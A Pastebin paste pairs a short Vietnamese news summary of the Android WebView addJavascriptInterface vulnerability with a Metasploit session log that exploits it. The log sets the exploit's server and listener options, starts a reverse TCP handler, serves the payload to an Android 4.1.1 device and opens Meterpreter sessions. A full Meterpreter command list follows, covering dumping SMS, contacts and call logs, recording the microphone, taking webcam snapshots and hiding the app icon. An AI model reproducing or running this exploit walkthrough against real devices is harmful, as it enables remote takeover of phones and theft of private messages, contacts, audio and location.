Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- link :https://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface
- Trang chủBảo mật Mobile Phone
- Lỗ hổng Android WebView cho phép tin tặc cài phần mềm độc hại
- Một lỗi an ninh đã ảnh hưởng điều khiển WebView trong những ứng dụng Android có thể bị những tin tặc lợi dụng để cài đặt phần mềm độc hại vào thiết bị người dùng .
- Theo các chuyên gia của AVG Technologies , lỗ hổng an ninh này ảnh hưởng tới các thiết bị dùng hệ điều hành cũ hơn bản Android 4.2 . Tin tặc có thể khác thác lỗi này bằng cách lôi kéo nạn nhân bấm vào đường Link từ ứng dụng bị lỗi để cho phép mở trình duyệt đã kích hoạt Java hoặc trang web .
- Những lệnh JavaScript độc hại đã nằm trong những trang web độc hại sẽ tự động thực hiện . Tin tặc có thể thực hiện nhiều hoạt động khác nhau như cài đặt phần mềm , gửi tin nhắn SMS và đánh cắp thông tin cá nhân .
- WebView được các nhà phát triển ứng dụng Android sử dụng khi họ muốn cho phép khách hàng xem những ứng dụng web . Lỗ hổng mà AVG phát hiện ra liên quan tới việc dùng phương pháp addJavascriptInterface .
- --
- root@osboxes:~# msfconsole
- --
- msf > use exploit/android/browser/webview_addjavascriptinterface
- --
- msf exploit(android/browser/webview_addjavascriptinterface) > set srvhost 192.168.1.9
- srvhost => 192.168.1.9
- msf exploit(android/browser/webview_addjavascriptinterface) > set srvport 1234
- srvport => 1234
- msf exploit(android/browser/webview_addjavascriptinterface) > set lhost 192.168.1.9
- lhost => 192.168.1.9
- msf exploit(android/browser/webview_addjavascriptinterface) > set lport 8080
- lport => 8080
- msf exploit(android/browser/webview_addjavascriptinterface) > set uripath /
- uripath => /
- msf exploit(android/browser/webview_addjavascriptinterface) > set verbose true
- verbose => true
- msf exploit(android/browser/webview_addjavascriptinterface) > run -j
- [*] Exploit running as background job 0.
- [*] Started reverse TCP handler on 192.168.1.9:8080
- [*] Using URL: http://192.168.1.9:1234/
- [*] Server started.
- msf exploit(android/browser/webview_addjavascriptinterface) >
- --
- msf exploit(android/browser/webview_addjavascriptinterface) > [*] 192.168.1.41 webview_addjavascriptinterface - Gathering target information for 192.168.1.41
- [*] 192.168.1.41 webview_addjavascriptinterface - Sending HTML response to 192.168.1.41
- [-] 192.168.1.41 webview_addjavascriptinterface - Target 192.168.1.41 has requested an unknown path: /favicon.ico
- [*] 192.168.1.41 webview_addjavascriptinterface - Serving x86 exploit...
- [*] Sending stage (70028 bytes) to 192.168.1.41
- [*] Meterpreter session 1 opened (192.168.1.20:8080 -> 192.168.1.41:56819) at 2018-06-01 20:43:42 -0400
- [*] 192.168.1.41 webview_addjavascriptinterface - Serving x86 exploit...
- [*] Sending stage (70028 bytes) to 192.168.1.41
- [*] Meterpreter session 2 opened (192.168.1.20:8080 -> 192.168.1.41:56838) at 2018-06-01 20:44:47 -0400
- sessions
- Active sessions
- ===============
- Id Name Type Information Connection
- -- ---- ---- ----------- ----------
- 1 meterpreter dalvik/android u0_a3 @ localhost 192.168.1.20:8080 -> 192.168.1.41:56819 (192.168.1.41)
- 2 meterpreter dalvik/android u0_a3 @ localhost 192.168.1.20:8080 -> 192.168.1.41:56838 (192.168.1.41)
- --
- msf exploit(android/browser/webview_addjavascriptinterface) > sessions 2
- [*] Starting interaction with 2...
- meterpreter >
- --
- meterpreter > sysinfo
- Computer : localhost
- OS : Android 4.1.1 - Linux 3.4.67-qemu+ (i686)
- Meterpreter : dalvik/android
- meterpreter >
- ---
- meterpreter >help
- Core Commands
- =============
- Command Description
- ------- -----------
- ? Help menu
- background Backgrounds the current session
- bgkill Kills a background meterpreter script
- bglist Lists running background scripts
- bgrun Executes a meterpreter script as a background thread
- channel Displays information or control active channels
- close Closes a channel
- disable_unicode_encoding Disables encoding of unicode strings
- enable_unicode_encoding Enables encoding of unicode strings
- exit Terminate the meterpreter session
- get_timeouts Get the current session timeout values
- guid Get the session GUID
- help Help menu
- info Displays information about a Post module
- irb Drop into irb scripting mode
- load Load one or more meterpreter extensions
- machine_id Get the MSF ID of the machine attached to the session
- quit Terminate the meterpreter session
- read Reads data from a channel
- resource Run the commands stored in a file
- run Executes a meterpreter script or Post module
- sessions Quickly switch to another session
- set_timeouts Set the current session timeout values
- sleep Force Meterpreter to go quiet, then re-establish session.
- transport Change the current transport mechanism
- use Deprecated alias for "load"
- uuid Get the UUID for the current session
- write Writes data to a channel
- Stdapi: File system Commands
- ============================
- Command Description
- ------- -----------
- cat Read the contents of a file to the screen
- cd Change directory
- checksum Retrieve the checksum of a file
- cp Copy source to destination
- dir List files (alias for ls)
- download Download a file or directory
- edit Edit a file
- getlwd Print local working directory
- getwd Print working directory
- lcd Change local working directory
- lpwd Print local working directory
- ls List files
- mkdir Make directory
- mv Move source to destination
- pwd Print working directory
- rm Delete the specified file
- rmdir Remove directory
- search Search for files
- upload Upload a file or directory
- Stdapi: Networking Commands
- ===========================
- Command Description
- ------- -----------
- ifconfig Display interfaces
- ipconfig Display interfaces
- portfwd Forward a local port to a remote service
- route View and modify the routing table
- Stdapi: System Commands
- =======================
- Command Description
- ------- -----------
- execute Execute a command
- getuid Get the user that the server is running as
- localtime Displays the target system's local date and time
- pgrep Filter processes by name
- ps List running processes
- shell Drop into a system command shell
- sysinfo Gets information about the remote system, such as OS
- Stdapi: User interface Commands
- ===============================
- Command Description
- ------- -----------
- screenshot Grab a screenshot of the interactive desktop
- Stdapi: Webcam Commands
- =======================
- Command Description
- ------- -----------
- record_mic Record audio from the default microphone for X seconds
- webcam_chat Start a video chat
- webcam_list List webcams
- webcam_snap Take a snapshot from the specified webcam
- webcam_stream Play a video stream from the specified webcam
- Android Commands
- ================
- Command Description
- ------- -----------
- activity_start Start an Android activity from a Uri string
- check_root Check if device is rooted
- dump_calllog Get call log
- dump_contacts Get contacts list
- dump_sms Get sms messages
- geolocate Get current lat-long using geolocation
- hide_app_icon Hide the app icon from the launcher
- interval_collect Manage interval collection capabilities
- send_sms Sends SMS from target session
- set_audio_mode Set Ringer Mode
- sqlite_query Query a SQLite database from storage
- wakelock Enable/Disable Wakelock
- wlan_geolocate Get current lat-long using WLAN information
- meterpreter >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement